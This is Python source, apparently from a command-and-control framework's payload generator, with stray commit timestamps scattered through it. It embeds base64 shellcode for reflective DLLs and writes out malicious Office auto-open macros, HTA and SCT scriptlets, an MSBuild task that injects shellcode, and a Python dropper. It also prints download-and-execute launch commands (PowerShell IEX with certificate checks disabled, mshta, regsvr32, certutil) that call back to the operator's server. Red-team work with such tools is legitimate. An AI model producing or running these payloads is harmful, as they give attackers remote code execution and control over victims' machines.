self . PatchDll ( " %s Posh_v2_x64_Shellcode.bin " % name , v2_64 , v2_64_offset , " Shellcode " )
# Load CLR "v4.0.30319"
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " ReflectiveDLL that loads CLR v4.0.30319 " + Colours . GREEN )
v4_86_offset = 0x000132E0 + 4
2018-08-01 08:31:59 +00:00
v4_86 = " 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
2018-07-23 08:55:15 +00:00
self . PatchDll ( " %s Posh-shellcode_x86.bin " % name , v4_86 , v4_86_offset , " Shellcode " )
2018-08-01 08:31:59 +00:00
v4_64_offset = 0x00017950 + 8
v4_64 = " 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
2018-07-23 08:55:15 +00:00
self . PatchDll ( " %s Posh-shellcode_x64.bin " % name , v4_64 , v4_64_offset , " Shellcode " )
def CreateSCT ( self ) :
basefile = self . CreateRawBase ( )
raw1 = """ <?XML version= " 1.0 " ?>
< scriptlet >
< registration
progid = " PoC "
classid = " { F0001111-0000-0000-0000-0000FEEDACDC} " >
< script language = " VBScript " >
Dim ghgfhgfh
set ghgfhgfh = CreateObject ( " shell.application " )
ghgfhgfh . ShellExecute " powershell.exe " , " -exec bypass -Noninteractive -windowstyle hidden -e %s " , " " , " open " , 0
< / script >
< / registration >
< / scriptlet >
""" % basefile
raw2 = """ <sCrIptlEt><scRIPt>
a = new ActiveXObject ( " Shell.Application " ) . ShellExecute ( " powershell.exe " , " -exec bypass -Noninteractive -windowstyle hidden -e %s " , " " , " open " , " 0 " ) ;
< / scRIPt > < / sCrIptlEt >
""" % basefile
filename = " %s rg_sct.xml " % ( self . BaseDirectory )
output_file = open ( filename , ' w ' )
output_file . write ( raw1 )
filename = " %s cs_sct.xml " % ( self . BaseDirectory )
output_file . close ( )
output_file = open ( filename , ' w ' )
output_file . write ( raw2 )
output_file . close ( )
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " Execution via Command Prompt " + Colours . GREEN )
psuri = self . HostnameIP + " : " + self . Serverport + " / " + QuickCommand + " _bs "
pscmd = " [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};IEX (new-object system.net.webclient).downloadstring( ' %s ' ) " % psuri
psurienc = base64 . b64encode ( pscmd . encode ( ' UTF-16LE ' ) )
uri = self . HostnameIP + " : " + self . Serverport + " / " + QuickCommand + " _cs "
self . QuickstartLog ( " powershell -exec bypass -Noninteractive -windowstyle hidden -c \" [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};IEX (new-object system.net.webclient).downloadstring( ' %s ' ) \" " % psuri )
self . QuickstartLog ( " " )
self . QuickstartLog ( " powershell -exec bypass -Noninteractive -windowstyle hidden -e %s " % psurienc )
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " Execution via Powershell " + Colours . GREEN )
self . QuickstartLog ( " [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};IEX (new-object system.net.webclient).downloadstring( ' %s ' ) " % psuri )
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " Other Execution Methods " + Colours . GREEN )
self . QuickstartLog ( " mshta.exe vbscript:GetObject( \" script: %s \" )(window.close) " % uri )
self . QuickstartLog ( " " )
uri = self . HostnameIP + " : " + self . Serverport + " / " + QuickCommand + " _rg "
self . QuickstartLog ( " regsvr32 /s /n /u /i: %s scrobj.dll " % uri )
def CreateHTA ( self ) :
basefile = self . CreateRawBase ( full = True )
hta = """ <script>
ao = new ActiveXObject ( " W " + " S " + " cr " + " ip " + " t. " + " Sh " + " e " + " l " + " l " ) ;
ao . run ( ' %s ' , 0 ) ; window . close ( ) ;
< / script > """ % basefile
self . QuickstartLog ( " HTA Payload written to: %s Launcher.hta " % self . BaseDirectory )
filename = " %s Launcher.hta " % ( self . BaseDirectory )
output_file = open ( filename , ' w ' )
output_file . write ( hta )
output_file . close ( )
def CreateCS ( self ) :
basefile = self . CreateRawBase ( )
with open ( " %s Posh.cs " % FilesDirectory , ' rb ' ) as f :
content = f . read ( )
cs = content . replace ( " #REPLACEME# " , basefile )
self . QuickstartLog ( " CS Payload written to: %s Posh.cs " % self . BaseDirectory )
filename = " %s Posh.cs " % ( self . BaseDirectory )
output_file = open ( filename , ' w ' )
output_file . write ( cs )
output_file . close ( )
def CreatePython ( self , name = " " ) :
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " OSX Python Payload: " + Colours . GREEN )
py = base64 . b64encode ( self . Python )
2018-08-03 21:14:33 +00:00
#print self.Python
2018-07-23 08:55:15 +00:00
pydropper = " echo \" import sys,base64;exec(base64.b64decode( ' %s ' )); \" | python & " % py
2018-09-23 07:49:00 +00:00
filename = " %s %s py_dropper.py " % ( self . BaseDirectory , name )
2018-08-14 22:40:35 +00:00
output_file = open ( filename , ' w ' )
output_file . write ( pydropper )
output_file . close ( )
2018-07-23 08:55:15 +00:00
self . QuickstartLog ( pydropper )
def CreateEXE ( self , name = " " ) :
with open ( " %s %s Posh-shellcode_x64.bin " % ( self . BaseDirectory , name ) , ' rb ' ) as f :
sc64 = f . read ( )
hexcode = " " . join ( " \\ x {:02x} " . format ( ord ( c ) ) for c in sc64 )
sc64 = formStr ( " char sc[] " , hexcode )
with open ( " %s Shellcode.c " % FilesDirectory , ' rb ' ) as f :
content = f . read ( )
ccode = content . replace ( " #REPLACEME# " , sc64 )
self . QuickstartLog ( " 64bit EXE Payload written to: %s %s Posh64.exe " % ( self . BaseDirectory , name ) )
filename = " %s %s Posh64.c " % ( self . BaseDirectory , name )
output_file = open ( filename , ' w ' )
output_file . write ( ccode )
output_file . close ( )
with open ( " %s Shellcode_migrate.c " % FilesDirectory , ' rb ' ) as f :
content = f . read ( )
ccode = content . replace ( " #REPLACEME# " , sc64 )
self . QuickstartLog ( " 64bit EXE Payload written to: %s %s Posh64_migrate.exe " % ( self . BaseDirectory , name ) )
filename = " %s %s Posh64_migrate.c " % ( self . BaseDirectory , name )
output_file = open ( filename , ' w ' )
output_file . write ( ccode )
output_file . close ( )
with open ( " %s %s Posh-shellcode_x86.bin " % ( self . BaseDirectory , name ) , ' rb ' ) as f :
sc32 = f . read ( )
hexcode = " " . join ( " \\ x {:02x} " . format ( ord ( c ) ) for c in sc32 )
sc32 = formStr ( " char sc[] " , hexcode )
with open ( " %s Shellcode.c " % FilesDirectory , ' rb ' ) as f :
content = f . read ( )
ccode = content . replace ( " #REPLACEME# " , sc32 )
self . QuickstartLog ( " 32bit EXE Payload written to: %s %s Posh32.exe " % ( self . BaseDirectory , name ) )
filename = " %s %s Posh32.c " % ( self . BaseDirectory , name )
output_file = open ( filename , ' w ' )
output_file . write ( ccode )
output_file . close ( )
with open ( " %s Shellcode_migrate.c " % FilesDirectory , ' rb ' ) as f :
content = f . read ( )
ccode = content . replace ( " #REPLACEME# " , sc32 )
self . QuickstartLog ( " 32bit EXE Payload written to: %s %s Posh32_migrate.exe " % ( self . BaseDirectory , name ) )
filename = " %s %s Posh32_migrate.c " % ( self . BaseDirectory , name )
output_file = open ( filename , ' w ' )
output_file . write ( ccode )
output_file . close ( )
try :
2018-08-09 14:09:07 +00:00
uri = self . HostnameIP + " : " + self . Serverport + " / " + QuickCommand + " _ex6 "
2018-07-23 08:55:15 +00:00
filename = randomuri ( )
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " Download Posh64.exe using certutil: " + Colours . GREEN )
self . QuickstartLog ( " certutil -urlcache -split -f %s %% temp %% \\ %s .exe " % ( uri , filename ) )
if os . name == ' nt ' :
compile64 = " C: \\ TDM-GCC-64 \\ bin \\ gcc.exe %s %s Posh64.c -o %s %s Posh64.exe " % ( self . BaseDirectory , name , self . BaseDirectory , name )
compile32 = " C: \\ TDM-GCC-32 \\ bin \\ gcc.exe %s %s Posh32.c -o %s %s Posh32.exe " % ( self . BaseDirectory , name , self . BaseDirectory , name )
else :
compile64 = " x86_64-w64-mingw32-gcc %s %s Posh64.c -o %s %s Posh64.exe " % ( self . BaseDirectory , name , self . BaseDirectory , name )
compile32 = " i686-w64-mingw32-gcc %s %s Posh32.c -o %s %s Posh32.exe " % ( self . BaseDirectory , name , self . BaseDirectory , name )
subprocess . check_output ( compile64 , shell = True )
subprocess . check_output ( compile32 , shell = True )
filename = randomuri ( )
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " Download Posh32.exe using certutil: " + Colours . GREEN )
self . QuickstartLog ( " certutil -urlcache -split -f %s %% temp %% \\ %s .exe " % ( uri , filename ) )
if os . name == ' nt ' :
compile64 = " C: \\ TDM-GCC-64 \\ bin \\ gcc.exe %s %s Posh64_migrate.c -o %s %s Posh64_migrate.exe " % ( self . BaseDirectory , name , self . BaseDirectory , name )
compile32 = " C: \\ TDM-GCC-32 \\ bin \\ gcc.exe %s %s Posh32_migrate.c -o %s %s Posh32_migrate.exe " % ( self . BaseDirectory , name , self . BaseDirectory , name )
else :
compile64 = " x86_64-w64-mingw32-gcc %s %s Posh64_migrate.c -o %s %s Posh64_migrate.exe " % ( self . BaseDirectory , name , self . BaseDirectory , name )
compile32 = " i686-w64-mingw32-gcc %s %s Posh32_migrate.c -o %s %s Posh32_migrate.exe " % ( self . BaseDirectory , name , self . BaseDirectory , name )
subprocess . check_output ( compile64 , shell = True )
subprocess . check_output ( compile32 , shell = True )
except Exception as e :
print e
print " apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common "
def CreateMacro ( self , name = " " ) :
basefile = self . CreateRawBase ( )
strmacro = formStrMacro ( " str " , basefile )
macro = """ Sub Auto_Open()
UpdateMacro
End Sub
Sub AutoOpen ( )
UpdateMacro
End Sub
Sub Workbook_Open ( )
UpdateMacro
End Sub
Sub WorkbookOpen ( )
UpdateMacro
End Sub
Sub Document_Open ( )
UpdateMacro
End Sub
Sub DocumentOpen ( )
UpdateMacro
End Sub
Sub UpdateMacro ( )
Dim str , exec
% s
exec = " p "
exec = exec + " o "
exec = exec + " w "
exec = exec + " e "
exec = exec + " r "
exec = exec + " s "
exec = exec + " h "
exec = exec + " e "
exec = exec + " l "
exec = exec + " l "
exec = exec + " . "
exec = exec + " e "
exec = exec + " x "
exec = exec + " e "
exec = exec + " -exec bypass -Noninteractive -windowstyle hidden -e " & str
Shell ( exec )
End Sub
""" % s trmacro
self . QuickstartLog ( " Macro Payload written to: %s %s macro.txt " % ( self . BaseDirectory , name ) )
filename = " %s macro.txt " % ( self . BaseDirectory )
output_file = open ( filename , ' w ' )
output_file . write ( macro )
output_file . close ( )
2018-09-16 15:53:44 +00:00
def CreateMsbuild ( self , name = " " ) :
x86filename = " %s %s " % ( self . BaseDirectory , name + " Posh-shellcode_x86.bin " )
x64filename = " %s %s " % ( self . BaseDirectory , name + " Posh-shellcode_x64.bin " )
with open ( x86filename , " rb " ) as b86 :
x86base64 = base64 . b64encode ( b86 . read ( ) )
with open ( x64filename , " rb " ) as b64 :
x64base64 = base64 . b64encode ( b64 . read ( ) )
projname = randomuri ( )
msbuild = """ <Project ToolsVersion= " 4.0 " xmlns= " http://schemas.microsoft.com/developer/msbuild/2003 " >
< Target Name = " %s " >
< % s / >
< / Target >
< UsingTask
TaskName = " %s "
TaskFactory = " CodeTaskFactory "
AssemblyFile = " C: \\ Windows \\ Microsoft.Net \\ Framework \\ v4.0.30319 \\ Microsoft.Build.Tasks.v4.0.dll " >
< Task >
< Code Type = " Class " Language = " cs " >
< ! [ CDATA [
using System ; using System . Runtime . InteropServices ; using Microsoft . Build . Framework ; using Microsoft . Build . Utilities ;
public class % s : Task , ITask
{
private static UInt32 MEM_COMMIT = 0x1000 ; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40 ;
[ DllImport ( " kernel32 " ) ] private static extern UInt32 VirtualAlloc ( UInt32 lpStartAddr , UInt32 size , UInt32 flAllocationType , UInt32 flProtect ) ;
[ DllImport ( " kernel32 " ) ] private static extern IntPtr CreateThread ( UInt32 lpThreadAttributes , UInt32 dwStackSize , UInt32 lpStartAddress , IntPtr param , UInt32 dwCreationFlags , ref UInt32 lpThreadId ) ;
[ DllImport ( " kernel32 " ) ] private static extern UInt32 WaitForSingleObject ( IntPtr hHandle , UInt32 dwMilliseconds ) ;
public override bool Execute ( )
{
string pw = " %s " ;
string sc32 = " %s " ;
string sc64 = " %s " ;
byte [ ] sc = null ;
if ( IntPtr . Size == 4 ) { sc = System . Convert . FromBase64String ( sc32 ) ; } else { sc = System . Convert . FromBase64String ( sc64 ) ; }
UInt32 funcAddr = VirtualAlloc ( 0 , ( UInt32 ) sc . Length , MEM_COMMIT , PAGE_EXECUTE_READWRITE ) ; Marshal . Copy ( sc , 0 , ( IntPtr ) ( funcAddr ) , sc . Length ) ; IntPtr hThread = IntPtr . Zero ; UInt32 threadId = 0 ; IntPtr pinfo = IntPtr . Zero ; hThread = CreateThread ( 0 , 0 , funcAddr , pinfo , 0 , ref threadId ) ; WaitForSingleObject ( hThread , 0xFFFFFFFF ) ; return true ; } }
] ] >
< / Code >
< / Task >
< / UsingTask >
< / Project >
""" % (projname,projname,projname,projname,projname,x86base64,x64base64)
self . QuickstartLog ( " Msbuild file written to: %s %s msbuild.xml " % ( self . BaseDirectory , name ) )
filename = " %s %s msbuild.xml " % ( self . BaseDirectory , name )
output_file = open ( filename , ' w ' )
output_file . write ( msbuild )
output_file . close ( )
